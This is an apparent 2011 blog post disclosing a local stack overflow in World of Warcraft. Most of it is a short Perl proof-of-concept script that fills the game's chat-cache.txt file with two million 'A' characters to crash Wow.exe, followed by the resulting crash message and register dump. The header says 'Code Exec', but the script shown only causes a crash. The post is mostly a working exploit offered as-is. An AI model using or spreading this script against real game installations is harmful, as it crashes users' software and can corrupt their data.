魔兽世界本地栈溢出漏洞

#!/usr/bin/perl # #标题: #魔兽世界本地栈溢出漏洞 (chat-cache.txt) # #"Code Exec" Exploit in analysis. # #测试环境: #系统: Windows 7 #游戏版本: 燃烧的远征,大灾变, 演示版. # #路径: #world of warcraft > WTF > account > file (numbers) > server_file > account_name_file > chat-cache.txt # #错误: #此应用程序遇到一个严重错误: # #ERROR #132 (0x85100084) 致命异常! # #Program: D:\World of Warcraft\Wow.exe #进程ID: 92024 #Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0109DA97 # #Registers: #---------------------------------------- # x86 Registers #---------------------------------------- # #EAX=000F2000 EBX=1BD920D8 ECX=000CC22C EDX=00000000 ESI=0012366F #EDI=00000000 EBP=001EFC5C ESP=001EF8A4 EIP=0109DA97 FLG=00010206 #CS =0023 DS =002B ES =002B SS =002B FS =0053 GS =002B my $file = "chat-cache.txt"; my $dos_junk = "A" x 2000000; open($File, ">$file"); print $File $dos_junk; close($File);
posted @ 2011-09-07 09:40  Mr.Jim  阅读(340)  评论(0编辑  收藏  举报